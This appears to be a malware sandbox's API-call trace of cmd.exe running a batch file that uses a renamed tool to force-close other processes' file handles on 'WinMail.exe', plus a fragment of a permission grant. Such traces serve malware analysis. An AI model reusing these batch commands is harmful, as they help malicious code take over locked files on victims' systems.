nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0241.417] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x2cf050 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0241.417] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x2cf050 | out: _Buffer=">") returned 1 [0241.417] _get_osfhandle (_FileHandle=1) returned 0x7 [0241.417] GetFileType (hFile=0x7) returned 0x2 [0241.418] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0241.418] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf018 | out: lpMode=0x2cf018) returned 1 [0241.418] _get_osfhandle (_FileHandle=1) returned 0x7 [0241.418] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x2cf044, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x2cf044*=0x26) returned 1 [0241.419] _get_osfhandle (_FileHandle=1) returned 0x7 [0241.419] GetFileType (hFile=0x7) returned 0x2 [0241.419] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0241.419] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf29c | out: lpMode=0x2cf29c) returned 1 [0241.420] _get_osfhandle (_FileHandle=1) returned 0x7 [0241.420] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x530cf0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x2cf2c8, lpReserved=0x0 | out: lpBuffer=0x530cf0*, lpNumberOfCharsWritten=0x2cf2c8*=0x3) returned 1 [0241.420] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x2cf2d4 | out: _Buffer=" FN=\"WinMail.exe\" ") returned 18 [0241.420] _get_osfhandle (_FileHandle=1) returned 0x7 [0241.420] GetFileType (hFile=0x7) returned 0x2 [0241.421] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0241.421] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf294 | out: lpMode=0x2cf294) returned 1 [0241.421] _get_osfhandle (_FileHandle=1) returned 0x7 [0241.421] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x12, lpNumberOfCharsWritten=0x2cf2c0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2cf2c0*=0x12) returned 1 [0241.422] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2cf2f4 | out: _Buffer="\r\n") returned 2 [0241.422] _get_osfhandle (_FileHandle=1) returned 0x7 [0241.422] GetFileType (hFile=0x7) returned 0x2 [0241.422] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0241.422] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf2b4 | out: lpMode=0x2cf2b4) returned 1 [0241.423] _get_osfhandle (_FileHandle=1) returned 0x7 [0241.423] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2cf2e0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2cf2e0*=0x2) returned 1 [0241.425] _wcsicmp (_String1="set", _String2="DIR") returned 15 [0241.425] _wcsicmp (_String1="set", _String2="ERASE") returned 14 [0241.425] _wcsicmp (_String1="set", _String2="DEL") returned 15 [0241.425] _wcsicmp (_String1="set", _String2="TYPE") returned -1 [0241.425] _wcsicmp (_String1="set", _String2="COPY") returned 16 [0241.425] _wcsicmp (_String1="set", _String2="CD") returned 16 [0241.425] _wcsicmp (_String1="set", _String2="CHDIR") returned 16 [0241.425] _wcsicmp (_String1="set", _String2="RENAME") returned 1 [0241.425] _wcsicmp (_String1="set", _String2="REN") returned 1 [0241.425] _wcsicmp (_String1="set", _String2="ECHO") returned 14 [0241.425] _wcsicmp (_String1="set", _String2="SET") returned 0 [0241.425] GetConsoleTitleW (in: lpConsoleTitle=0x2cee64, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0241.426] wcsncmp (_String1="FN", _String2="/", _MaxCount=0x4) returned 23 [0241.427] SetEnvironmentVariableW (lpName="FN", lpValue="\"WinMail.exe\"") returned 1 [0241.427] GetProcessHeap () returned 0x530000 [0241.427] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x548168 | out: hHeap=0x530000) returned 1 [0241.427] GetEnvironmentStringsW () returned 0x546b08* [0241.427] GetProcessHeap () returned 0x530000 [0241.427] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb7e) returned 0x547690 [0241.427] FreeEnvironmentStringsW (penv=0x546b08) returned 1 [0241.427] _get_osfhandle (_FileHandle=1) returned 0x7 [0241.427] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0241.428] _get_osfhandle (_FileHandle=1) returned 0x7 [0241.428] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0241.428] _get_osfhandle (_FileHandle=0) returned 0x3 [0241.428] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0241.429] SetConsoleInputExeNameW () returned 0x1 [0241.429] GetConsoleOutputCP () returned 0x1b5 [0241.429] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0241.429] SetThreadUILanguage (LangId=0x0) returned 0x409 [0241.429] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2cf29c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0241.430] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0241.430] _get_osfhandle (_FileHandle=3) returned 0x78 [0241.430] SetFilePointer (in: hFile=0x78, lDistanceToMove=63, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0241.430] GetProcessHeap () returned 0x530000 [0241.430] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5441d0 | out: hHeap=0x530000) returned 1 [0241.430] GetProcessHeap () returned 0x530000 [0241.430] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544198 | out: hHeap=0x530000) returned 1 [0241.430] GetProcessHeap () returned 0x530000 [0241.430] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544160 | out: hHeap=0x530000) returned 1 [0241.430] GetProcessHeap () returned 0x530000 [0241.430] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x530ce8 | out: hHeap=0x530000) returned 1 [0241.431] GetProcessHeap () returned 0x530000 [0241.431] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5311c0 | out: hHeap=0x530000) returned 1 [0241.431] GetProcessHeap () returned 0x530000 [0241.431] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x545838 | out: hHeap=0x530000) returned 1 [0241.431] GetProcessHeap () returned 0x530000 [0241.431] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x531240 | out: hHeap=0x530000) returned 1 [0241.431] _get_osfhandle (_FileHandle=3) returned 0x78 [0241.431] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x3f [0241.431] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x2cf280, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x2cf280*=0xa3, lpOverlapped=0x0) returned 1 [0241.431] SetFilePointer (in: hFile=0x78, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0241.431] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=15, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="cd /d \"%~dp0\"\r\n\nUSERNAME%:F /C\r\n") returned 15 [0241.432] _get_osfhandle (_FileHandle=3) returned 0x78 [0241.432] GetFileType (hFile=0x78) returned 0x1 [0241.432] _get_osfhandle (_FileHandle=3) returned 0x78 [0241.432] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0241.432] GetProcessHeap () returned 0x530000 [0241.432] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x400a) returned 0x554af8 [0241.432] GetProcessHeap () returned 0x530000 [0241.432] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x70) returned 0x531240 [0241.432] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", nBufferLength=0x208, lpBuffer=0x2cea10, lpFilePart=0x2cea08 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFilePart=0x2cea08*="Ch81ANBE.bat") returned 0x32 [0241.432] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ce724 | out: lpFindFileData=0x2ce724*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4595f660, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x4595f660, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x5311c0 [0241.432] FindClose (in: hFindFile=0x5311c0 | out: hFindFile=0x5311c0) returned 1 [0241.433] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x2ce724 | out: lpFindFileData=0x2ce724*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x45665ae0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x45665ae0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x5311c0 [0241.433] FindClose (in: hFindFile=0x5311c0 | out: hFindFile=0x5311c0) returned 1 [0241.433] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0241.433] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x2ce724 | out: lpFindFileData=0x2ce724*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x5311c0 [0241.433] FindClose (in: hFindFile=0x5311c0 | out: hFindFile=0x5311c0) returned 1 [0241.433] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat", lpFindFileData=0x2ce724 | out: lpFindFileData=0x2ce724*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfb0ce860, ftCreationTime.dwHighDateTime=0x1d68286, ftLastAccessTime.dwLowDateTime=0xfb0ce860, ftLastAccessTime.dwHighDateTime=0x1d68286, ftLastWriteTime.dwLowDateTime=0xfb0ce860, ftLastWriteTime.dwHighDateTime=0x1d68286, nFileSizeHigh=0x0, nFileSizeLow=0xe2, dwReserved0=0x0, dwReserved1=0x0, cFileName="Ch81ANBE.bat", cAlternateFileName="")) returned 0x5311c0 [0241.433] FindClose (in: hFindFile=0x5311c0 | out: hFindFile=0x5311c0) returned 1 [0241.433] GetProcessHeap () returned 0x530000 [0241.433] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x56) returned 0x5311c0 [0241.434] GetProcessHeap () returned 0x530000 [0241.434] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x554af8 | out: hHeap=0x530000) returned 1 [0241.436] _tell (_FileHandle=3) returned 78 [0241.437] _close (_FileHandle=3) returned 0 [0241.437] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2cf054 | out: _Buffer="\r\n") returned 2 [0241.437] _get_osfhandle (_FileHandle=1) returned 0x7 [0241.437] GetFileType (hFile=0x7) returned 0x2 [0241.437] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0241.437] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf014 | out: lpMode=0x2cf014) returned 1 [0241.438] _get_osfhandle (_FileHandle=1) returned 0x7 [0241.438] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2cf040, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2cf040*=0x2) returned 1 [0241.440] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0241.440] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0241.440] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x2cf050 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0241.440] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x2cf050 | out: _Buffer=">") returned 1 [0241.440] _get_osfhandle (_FileHandle=1) returned 0x7 [0241.440] GetFileType (hFile=0x7) returned 0x2 [0241.441] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0241.441] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf018 | out: lpMode=0x2cf018) returned 1 [0241.441] _get_osfhandle (_FileHandle=1) returned 0x7 [0241.441] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x2cf044, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x2cf044*=0x26) returned 1 [0241.442] _get_osfhandle (_FileHandle=1) returned 0x7 [0241.442] GetFileType (hFile=0x7) returned 0x2 [0241.442] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0241.442] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf29c | out: lpMode=0x2cf29c) returned 1 [0241.443] _get_osfhandle (_FileHandle=1) returned 0x7 [0241.443] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x530cf0*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2cf2c8, lpReserved=0x0 | out: lpBuffer=0x530cf0*, lpNumberOfCharsWritten=0x2cf2c8*=0x2) returned 1 [0241.443] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x2cf2d4 | out: _Buffer=" /d \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\\" ") returned 45 [0241.443] _get_osfhandle (_FileHandle=1) returned 0x7 [0241.443] GetFileType (hFile=0x7) returned 0x2 [0241.444] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0241.444] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf294 | out: lpMode=0x2cf294) returned 1 [0241.444] _get_osfhandle (_FileHandle=1) returned 0x7 [0241.444] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2d, lpNumberOfCharsWritten=0x2cf2c0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2cf2c0*=0x2d) returned 1 [0241.446] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2cf2f4 | out: _Buffer="\r\n") returned 2 [0241.446] _get_osfhandle (_FileHandle=1) returned 0x7 [0241.446] GetFileType (hFile=0x7) returned 0x2 [0241.447] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0241.447] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2cf2b4 | out: lpMode=0x2cf2b4) returned 1 [0241.447] _get_osfhandle (_FileHandle=1) returned 0x7 [0241.447] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x2cf2e0, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x2cf2e0*=0x2) returned 1 [0241.449] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0241.449] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0241.449] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0241.449] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0241.449] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0241.449] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0241.450] GetConsoleTitleW (in: lpConsoleTitle=0x2cee64, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0241.451] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0241.451] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0241.451] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2cec20, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x2cec18, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2cec18*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0241.452] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ce9bc | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0241.452] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", nBufferLength=0x104, lpBuffer=0x2ce9bc, lpFilePart=0x2ce9b8 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpFilePart=0x2ce9b8*=0x0) returned 0x26 [0241.452] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0241.452] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ce738 | out: lpFindFileData=0x2ce738*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x4595f660, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x4595f660, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x544440 [0241.452] FindClose (in: hFindFile=0x544440 | out: hFindFile=0x544440) returned 1 [0241.452] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x2ce738 | out: lpFindFileData=0x2ce738*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x45665ae0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x45665ae0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x544440 [0241.452] FindClose (in: hFindFile=0x544440 | out: hFindFile=0x544440) returned 1 [0241.452] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0241.453] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x2ce738 | out: lpFindFileData=0x2ce738*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x544440 [0241.453] FindClose (in: hFindFile=0x544440 | out: hFindFile=0x544440) returned 1 [0241.453] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0241.453] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0241.453] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0241.453] GetProcessHeap () returned 0x530000 [0241.453] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x547690 | out: hHeap=0x530000) returned 1 [0241.453] GetEnvironmentStringsW () returned 0x546b08* [0241.453] GetProcessHeap () returned 0x530000 [0241.453] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xb7e) returned 0x547690 [0241.453] FreeEnvironmentStringsW (penv=0x546b08) returned 1 [0241.453] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0241.453] GetProcessHeap () returned 0x530000 [0241.453] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5443e0 | out: hHeap=0x530000) returned 1 [0241.453] GetProcessHeap () returned 0x530000 [0241.453] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544380 | out: hHeap=0x530000) returned 1 [0241.453] _get_osfhandle (_FileHandle=1) returned 0x7 [0241.454] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0241.455] _get_osfhandle (_FileHandle=1) returned 0x7 [0241.455] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0241.455] _get_osfhandle (_FileHandle=0) returned 0x3 [0241.455] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0241.456] SetConsoleInputExeNameW () returned 0x1 [0241.456] GetConsoleOutputCP () returned 0x1b5 [0241.456] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0241.456] SetThreadUILanguage (LangId=0x0) returned 0x409 [0241.456] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2cf29c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0241.457] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0241.457] _get_osfhandle (_FileHandle=3) returned 0x78 [0241.457] SetFilePointer (in: hFile=0x78, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0241.457] GetProcessHeap () returned 0x530000 [0241.457] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544310 | out: hHeap=0x530000) returned 1 [0241.457] GetProcessHeap () returned 0x530000 [0241.458] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5442a0 | out: hHeap=0x530000) returned 1 [0241.458] GetProcessHeap () returned 0x530000 [0241.458] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544230 | out: hHeap=0x530000) returned 1 [0241.458] GetProcessHeap () returned 0x530000 [0241.458] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5441c0 | out: hHeap=0x530000) returned 1 [0241.458] GetProcessHeap () returned 0x530000 [0241.458] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x530ce8 | out: hHeap=0x530000) returned 1 [0241.458] GetProcessHeap () returned 0x530000 [0241.458] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x544160 | out: hHeap=0x530000) returned 1 [0241.458] GetProcessHeap () returned 0x530000 [0241.458] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x5311c0 | out: hHeap=0x530000) returned 1 [0241.458] GetProcessHeap () returned 0x530000 [0241.458] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x531240 | out: hHeap=0x530000) returned 1 [0241.458] _get_osfhandle (_FileHandle=3) returned 0x78 [0241.458] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0241.458] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x2cf280, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x2cf280*=0x94, lpOverlapped=0x0) returned 1 [0241.458] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=148, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="FOR /F \"UseBackQ Tokens=3,6 delims=: \" %%I IN (`tdq963ii.exe -accepteula %FN% -nobanner`) DO (tdq963ii.exe -accepteula -c %%J -y -p %%I -nobanner)\r\n") returned 148 [0241.459] _get_osfhandle (_FileHandle=3) returned 0x78 [0241.459] GetFileType (hFile=0x78) returned 0x1 [0241.459] _get_osfhandle (_FileHandle=3) returned 0x78 [0241.459] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0241.459] GetProcessHeap () returned 0x530000 [0241.459] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x400a) returned 0x554af8 [0241.459] GetProcessHeap () returned 0x530000 [0241.459] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0x4008) returned 0x558b10 [0241.461] GetProcessHeap () returned 0x530000 [0241.461] RtlAllocateHeap (HeapHandle=0x530000, Flags=0x8, Size=0xe) returned 0x530ce8 [0241.461] GetEnvironmentVariableW (in: lpName="FN", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="\"WinMail.exe\"") returned 0xd [0241.461] GetProcessHeap () returned 0x530000 [0241.461] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x530ce8 | out: hHeap=0x530000) returned 1 [0241.461] GetProcessHeap () returned 0x530000 [0241.461] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x558b10 | out: hHeap=0x530000) returned 1 [0241.462] GetProcessHeap () returned 0x530000 [0241.462] HeapFree (in: hHeap=0x530000, dwFlags=0x0, lpMem=0x554af8 | out: hHeap=0x530000) returned 1 [0241.648] _tell (_FileHandle=3) returned 226 [0241.648] _close (_FileHandle=3) returned 0 [0241.648] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x2cf054 | out: _Buffer="\r\n") returned 2 [0241.648] _get_osfhandle (_FileHandle=1) 